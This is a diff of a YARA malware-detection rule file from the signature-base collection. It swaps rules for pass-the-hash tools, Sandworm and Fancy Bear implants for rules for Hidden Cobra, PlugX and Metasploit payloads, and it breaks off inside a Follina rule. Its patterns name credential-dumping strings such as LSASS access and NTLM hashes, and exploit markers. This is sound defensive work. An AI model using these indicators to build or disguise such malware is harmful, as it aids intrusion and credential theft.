+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fancybear_dnc.yar#L30-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "180993057c110c0c0327b673c6d6e251534012de51cf6475838691e0942a1aa8"
+		logic_hash = "c6055b7cd04b994c80395276e83bec664b7dd32f8093411bfde0850cca39e9f7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = {38 00 00 19 90 09 01 A4}
-		$ = {3C 00 00 01 60 00 80 00 90 09 01 A8}
-		$ = {38 00 40 00 90 09 01 AC}
-		$ = {38 00 01 0B 90 09 01 B0}
-		$ = {38 00 27 11 90 09 01 C0}
+		$s1 = "pagemgr.exe" wide fullword
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( 3 of them )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Handle_Mod_0X51_Command : FILE
+rule SIGNATURE_BASE_Hiddencobra_Rule_1
 {
 	meta:
-		description = "Detects the code bytes used to check commands sent to module ID 0x51 and notable strings relating to the Cyclops Blink update process"
-		author = "NCSC"
-		id = "a6800aed-27dc-5d01-b005-1eb4a62344a3"
-		date = "2022-02-23"
+		description = "Detects Hidden Cobra Malware"
+		author = "US CERT"
+		id = "921c027e-fac3-5419-b0a6-5043f5cde466"
+		date = "2017-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L176-L200"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L11-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8a68f4a5f5b7a45819e9a198881aa41b75a65181b63788c8b824b339bfd6fc67"
+		logic_hash = "e8bb844d72b7d7564caec0d0842889000c77611eeb24ac5c5cb35072a92c9d10"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		tags = ""
 
 	strings:
-		$cmd_check = {88 1F [2] 54 00 06 3E 2F 80 00 (01|02|03) }
-		$path1 = "/etc/wg/configd-hash.xml"
-		$path2 = "/etc/wg/config.xml"
-		$mnt_arg1 = "ext2"
-		$mnt_arg2 = "errors=continue"
-		$mnt_arg3 = {38 C0 0C 20}
-		$mnt_arg4 = {38 C0 0C 21}
+		$rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94
+            A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77
+            48 EE 6F 4B 9B 53 60 98 45 A5 28 65 8A 0B F8 39
+            73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2
+            AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED
+            39 3F FA D0 AD 3D D9 C5 3D 28 EF 3D 67 B1 E0 68
+            3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13
+            B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0}
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( #cmd_check == 3 ) and ( ( @cmd_check [ 3 ] - @cmd_check [ 1 ] ) < 0x200 ) and ( all of ( $path* ) ) and ( all of ( $mnt_arg* ) )
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_CVE_2021_31166_Accept_Encoding_May21_1 : CVE_2021_31166
+rule SIGNATURE_BASE_Hiddencobra_Rule_3
 {
 	meta:
-		description = "Detects malformed Accept-Encoding header field as used in code exploiting CVE-2021-31166"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d0a79cdc-f3ee-58f9-805c-ec9eb7993315"
-		date = "2021-05-21"
+		description = "Detects Hidden Cobra Malware"
+		author = "US CERT"
+		id = "39c7e039-4b07-575d-a93a-539ecc4e63d8"
+		date = "2017-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/0vercl0k/CVE-2021-31166"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2021_31166.yar#L2-L14"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L52-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5bb5b4093a7abe9d4297a4c047803b92f7c08f56f15b0f7bd163203ae47e026d"
-		score = 70
-		quality = 60
-		tags = "CVE-2021-31166"
+		logic_hash = "6c0e385e46fe9d6cde7d2bc8ef059cfd8c33ef5b17e9fcd7cea97863fb8d2c24"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$xr1 = /[Aa]ccept\-[Ee]ncoding: [a-z\-]{1,16},([a-z\-\s]{1,16},|)*[\s]{1,20},/
+		$randomUrlBuilder = { 83 EC 48 53 55 56 57 8B 3D ?? ?? ?? ?? 33 C0 C7
+         44 24 28 B4 6F 41 00 C7 44 24 2C B0 6F 41 00 C7 44 24 30 AC 6F 41
+         00 C7 44 24 34 A8 6F 41 00 C7 44 24 38 A4 6F 41 00 C7 44 24 3C A0
+         6F 41 00 C7 44 24 40 9C 6F 41 00 C7 44 24 44 94 6F 41 00 C7 44 24
+         48 8C 6F 41 00 C7 44 24 4C 88 6F 41 00 C7 44 24 50 80 6F 41 00 89
+         44 24 54 C7 44 24 10 7C 6F 41 00 C7 44 24 14 78 6F 41 00 C7 44 24
+         18 74 6F 41 00 C7 44 24 1C 70 6F 41 00 C7 44 24 20 6C 6F 41 00 89
+         44 24 24 FF D7 99 B9 0B 00 00 00 F7 F9 8B 74 94 28 BA 9C 6F 41 00
+         66 8B 06 66 3B 02 74 34 8B FE 83 C9 FF 33 C0 8B 54 24 60 F2 AE 8B
+         6C 24 5C A1 ?? ?? ?? ?? F7 D1 49 89 45 00 8B FE 33 C0 8D 5C 11 05
+         83 C9 FF 03 DD F2 AE F7 D1 49 8B FE 8B D1 EB 78 FF D7 99 B9 05 00
+         00 00 8B 6C 24 5C F7 F9 83 C9 FF 33 C0 8B 74 94 10 8B 54 24 60 8B
+         FE F2 AE F7 D1 49 BF 60 6F 41 00 8B D9 83 C9 FF F2 AE F7 D1 8B C2
+         49 03 C3 8B FE 8D 5C 01 05 8B 0D ?? ?? ?? ?? 89 4D 00 83 C9 FF 33
+         C0 03 DD F2 AE F7 D1 49 8D 7C 2A 05 8B D1 C1 E9 02 F3 A5 8B CA 83
+         E1 03 F3 A4 BF 60 6F 41 00 83 C9 FF F2 AE F7 D1 49 BE 60 6F 41 00
+         8B D1 8B FE 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FB 2B F9 8B CA 8B C1
+         C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7C 24 60 8D 75 04 57 56 E8
+         ?? ?? ?? ?? 83 C4 08 C6 04 3E 2E 8B C5 C6 03 00 5F 5E 5D 5B 83 C4
+         48 C3 }
 
 	condition:
-		1 of them
+		$randomUrlBuilder
 }
-rule SIGNATURE_BASE_Whosthere_Alt : FILE
+rule SIGNATURE_BASE_APT_Hiddencobra_Ghostsecret_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file whosthere-alt.exe"
+		description = "Detects Hidden Cobra Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
-		date = "2015-07-10"
+		id = "d6955294-84a4-5694-87c9-b5b1c39e0fae"
+		date = "2018-08-11"
 		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L10-L31"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L87-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de"
-		logic_hash = "ef7bccb8f63034b885cfaec27663c9b038cd9b1811b4f25a9eae28640dac248b"
-		score = 80
+		logic_hash = "b1e72ca66520152b444cc415bdf54921ebba9671519d3b0327316cee2bf0ba1d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "05a567fe3f7c22a0ef78cc39dcf2d9ff283580c82bdbe880af9549e7014becfc"
 
 	strings:
-		$s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
-		$s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
-		$s2 = "dump output to a file, -o filename" fullword ascii
-		$s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii
-		$s4 = "Error: pth.dll is not in the current directory!." fullword ascii
-		$s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii
-		$s6 = ".\\pth.dll" fullword ascii
-		$s7 = "Cannot get LSASS.EXE PID!" fullword ascii
+		$s1 = "%s\\%s.dll" fullword wide
+		$s2 = "PROXY_SVC_DLL.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 280KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_Iam_Alt_Iam_Alt : FILE
+rule SIGNATURE_BASE_APT_Hiddencobra_Ghostsecret_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file iam-alt.exe"
+		description = "Detects Hidden Cobra Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cf8ec963-ed23-531e-8ea2-ff9f8643aa75"
-		date = "2015-07-10"
+		id = "dab5b0ec-ae89-521e-bbb9-15602db9ed6c"
+		date = "2018-08-11"
 		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L33-L54"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L103-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90"
-		logic_hash = "acd4dae57e8394d4ce2f3dfb44706ea35c3d684ab34fd0c707b6aeedd816280a"
-		score = 80
+		logic_hash = "878711f5e1a8a3cfefdaf13fc08a4778fba9d2f729248784cf72b610c8bc5e17"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "45e68dce0f75353c448865b9abafbef5d4ed6492cd7058f65bf6aac182a9176a"
 
 	strings:
-		$s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
-		$s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
-		$s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii
-		$s3 = "username:domainname:lmhash:nthash" fullword ascii
-		$s4 = "Error in cmdline!. Bye!." fullword ascii
-		$s5 = "Error: Cannot open LSASS.EXE!." fullword ascii
-		$s6 = "nthash is too long!." fullword ascii
-		$s7 = "LSASS HANDLE: %x" fullword ascii
+		$s1 = "ping 127.0.0.1 -n 3" fullword wide
+		$s2 = "Process32" fullword ascii
+		$s11 = "%2d%2d%2d%2d%2d%2d" fullword ascii
+		$s12 = "del /a \"" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Genhash_Genhash : FILE
+rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file genhash.exe"
+		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bec3c014-df3b-5ac0-9501-9b648856e02b"
-		date = "2015-07-10"
+		id = "923a0812-f375-5c0c-a22c-fc71ddcad4e3"
+		date = "2019-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L56-L74"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L124-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f"
-		logic_hash = "fe1ebe7ea94351610e0042eab020d155cbab26d790477909467c9b5a827fb6d6"
-		score = 80
+		logic_hash = "6cd036129ea54f4e3a2c52bf9ebd04e2d368e737cf83ca34a8feb79ea477a3af"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d77fdabe17cdba62a8e728cbe6c740e2c2e541072501f77988674e07a05dfb39"
 
 	strings:
-		$s1 = "genhash.exe <password>" fullword ascii
-		$s3 = "Password: %s" fullword ascii
-		$s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii
-		$s5 = "This tool generates LM and NT hashes." fullword ascii
-		$s6 = "(hashes format: LM Hash:NT hash)" fullword ascii
+		$s1 = "www.naver.com" fullword ascii
+		$s2 = "PolarSSL Test CA0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Iam_Iamdll : FILE
+rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file iamdll.dll"
+		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15e8ddac-af17-5509-b552-b4364af57c90"
-		date = "2015-07-10"
+		id = "9c7fd381-272a-5cfc-a7ee-7f0f9221fa04"
+		date = "2019-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L76-L92"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L139-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602"
-		logic_hash = "ef7c66d2e1204a43921b6701812ea8a7bfa8e39e24d9396c95b725a4a4171010"
-		score = 80
+		logic_hash = "741d69b470ac230d502116ebd5f09bbf4bdbbbdd7e70b97a4bd5d3f2c8e148ef"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "70034b33f59c6698403293cdc28676c7daa8c49031089efa6eefce41e22dccb3"
 
 	strings:
-		$s0 = "LSASRV.DLL" fullword ascii
-		$s1 = "iamdll.dll" fullword ascii
-		$s2 = "ChangeCreds" fullword ascii
+		$s1 = "%SystemRoot%\\System32\\svchost.exe -k mdnetuse" fullword ascii
+		$s2 = "%s\\hid.dll" fullword ascii
+		$s3 = "%Systemroot%\\System32\\" ascii
+		$s4 = "SYSTEM\\CurrentControlSet\\services\\%s\\Parameters" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 115KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Iam_Iam : FILE
+rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_3 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file iam.exe"
+		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15e8ddac-af17-5509-b552-b4364af57c90"
-		date = "2015-07-10"
+		id = "683b4d64-575a-5bdb-9ad8-e10a60037032"
+		date = "2019-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L94-L114"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L156-L185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231"
-		logic_hash = "f170f6f71b81a674a269ddd441c77a43afbbfe2870e1d0c4101abd2e58bff0b0"
-		score = 80
+		logic_hash = "5cbdf0c4c5025bc1d95d27a32fa69efb329e8f74243646a31458fea225d21875"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525"
+		hash2 = "05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461"
+		hash3 = "ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d"
 
 	strings:
-		$s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
-		$s2 = "iam.exe -h administrator:mydomain:" ascii
-		$s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii
-		$s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii
-		$s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii
-		$s6 = "Error in cmdline!. Bye!." fullword ascii
-		$s7 = "Checking LSASRV.DLL...." fullword ascii
+		$s1 = "Oleaut32.dll" fullword ascii
+		$s2 = "Process32NextA" fullword ascii
+		$s3 = "Process32FirstA" fullword ascii
+		$s4 = "%sRSA key size  : %d bits" fullword ascii
+		$s5 = "emailAddress=" fullword ascii
+		$s6 = "%scert. version : %d" fullword ascii
+		$s7 = "www.naver.com" fullword ascii
+		$x1 = "ztretrtireotreotieroptkierert" fullword ascii
+		$x2 = "reykfgkodfgkfdskgdfogpdokgsdfpg" fullword ascii
+		$x3 = "fjiejffndxklfsdkfjsaadiepwn" fullword ascii
+		$x4 = "fgwljusjpdjah" fullword ascii
+		$x5 = "udbcgiut.dat" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or 6 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Whosthere_Alt_Pth : FILE
+rule SIGNATURE_BASE_Aptgroupx_Plugxtrojanloader_Stringdecode
 {
 	meta:
-		description = "Auto-generated rule - file pth.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
-		date = "2015-07-10"
+		description = "Rule to detect PlugX Malware"
+		author = "Jay DiMartino"
+		id = "c6017327-b44d-5b1d-95aa-6e1f9fbf5583"
+		date = "2016-08-17"
 		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L116-L134"
+		reference = "https://t.co/4xQ8G2mNap"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_plugx.yar#L2-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0"
-		logic_hash = "137b0dae105f97b5d4352d16e52144e72306e61be57c5d93df77ad3f5808018e"
+		logic_hash = "e5ab15b035bb0169864e687e5c26732dd5b8f5f184473a33e685f53699ce4acc"
 		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "0535e8c300204e257f0fa57630f386e9fcc8e779"
+		hash2 = "088ebf9ccde958f32d11f4e7eb14f5332332f97d"
+		hash3 = "0c999d0bffa007e9e6b6fe593933b52f40c75b3d"
+		hash4 = "2f644e7131ec0a4f12ce04ba1e54d23856dbbfbf"
+		hash5 = "3be9148ad132ca342d5fbabea1119a175ef1df7c"
+		hash6 = "4c1ee94ec0e15491fc4f6b4095f67eee6309e62a"
+		hash7 = "587af7ce05e61d4c312d6bae12ea380116b08d7e"
+		hash8 = "5990efd83b5646a7ba419541d3a2c19260224ca3"
+		hash9 = "67970367c250c44a5feb263843cf45fd91336df5"
+		hash10 = "68f53f7188910a4cf67843aedd38c1523f1f2e7c"
+		hash11 = "962dc7e0ad37286df012f623423ac4182fe791ca"
+		hash12 = "aa0976906807af2e1b127608040aa3ef6e118a13"
+		hash13 = "b170d015e32b39fa4ac15f94d58e45e65cd16d6c"
+		hash14 = "c9b3d2cef3b34c7ee18fc2f60ff022965959613d"
+		hash15 = "cd425ce7f3e4a823d9027780e1b439759c4dc665"
+		hash16 = "d5e82513c6472d3826a22d9a15c05af8c0d33b58"
+		hash17 = "d9b32084f27ef13001060e1dcee8a1a9e95d89a6"
+		hash18 = "daa2d1cb9148b7ba5a86fa9ab593678e77c92672"
+		hash19 = "e2c098a95d1c1f0e29f207af9c5ffc5bd69a92ee"
+		hash20 = "ef8cf68dc3c80e9cb5a3fa0f92b544eab583812e"
+		hash21 = "f0fc0a4e4e0748464caa6a202d0083cd33458677"
+		hash22 = "fe1abe55529c1d6aa6b2a2f02d7e41ea58040feb"
 
 	strings:
-		$s0 = "c:\\debug.txt" fullword ascii
-		$s1 = "pth.dll" fullword ascii
-		$s2 = "\"Primary\" string found at %.8Xh" fullword ascii
-		$s3 = "\"Primary\" string not found!" fullword ascii
-		$s4 = "segment 1 found at %.8Xh" fullword ascii
+		$byte1 = { 8A [2-4] 8A [2-4] FF 05 00 30 00 10 [0-5] 2A [1-6] 80 [2-7] 02 [1-6] 88 0? }
+		$byte2 = { 8B [2-4] 8A [2-4] FF 05 00 30 00 10 [0-5] 2A [1-6] 80 [2-7] 02 [1-6] 88 0? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and 4 of them
+		any of them
 }
-rule SIGNATURE_BASE_Whosthere : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf : FILE
 {
 	meta:
-		description = "Auto-generated rule - file whosthere.exe"
+		description = "Metasploit Payloads - file msf.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L136-L155"
+		id = "c56dbb8e-1e03-5112-b2ef-a0adfd14dffa"
+		date = "2017-02-09"
+		modified = "2022-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L10-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37"
-		logic_hash = "a13c8a1fc66381b040d6449fe9655191d7a1762da0dc70789cd497fb68fb2a55"
-		score = 80
+		logic_hash = "4f0eab53a135242c7891b8c88e937a854c945a10000ca4cbf7b21f4596dca410"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "320a01ec4e023fb5fbbaef963a2b57229e4f918847e5a49c7a3f631cb556e96c"
 
 	strings:
-		$s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
-		$s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
-		$s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii
-		$s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii
-		$s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii
-		$s6 = "Cannot get LSASS.EXE PID!" fullword ascii
+		$s1 = "export buf=\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 320KB and 2 of them
+		filesize < 5MB and $s1
 }
-rule SIGNATURE_BASE_SUSP_PS1_Msdt_Execution_May22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_2
 {
 	meta:
-		description = "Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation"
-		author = "Nasreddine Bencherchali, Christian Burkard"
-		id = "d48d9ac9-7d3e-51c9-b017-22829ae5ecfd"
-		date = "2022-05-31"
-		modified = "2025-03-21"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L2-L36"
+		description = "Metasploit Payloads - file msf.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ec1ae1b6-18a3-5590-ae15-1e2b362c545a"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L25-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b8a061de4210d23e58b5190a300ee331273fc98f357156a0bb1d79f9f2b49b1"
-		score = 65
+		logic_hash = "8f803a5d71a084e1ea453638bdeaa2dd590a1912be652b74b065d9afd332ffa2"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e52f98466b92ee9629d564453af6f27bd3645e00a9e2da518f5a64a33ccf8eb5"
 
 	strings:
-		$a = "PCWDiagnostic" ascii wide fullword
-		$sa1 = "msdt.exe" ascii wide
-		$sa2 = "msdt " ascii wide
-		$sa3 = "ms-msdt" ascii wide
-		$sb1 = "/af " ascii wide
-		$sb2 = "-af " ascii wide
-		$sb3 = "IT_BrowseForFile=" ascii wide
-		$fp1 = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00
-               46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00
-               00 00 70 00 63 00 77 00 72 00 75 00 6E 00 2E 00
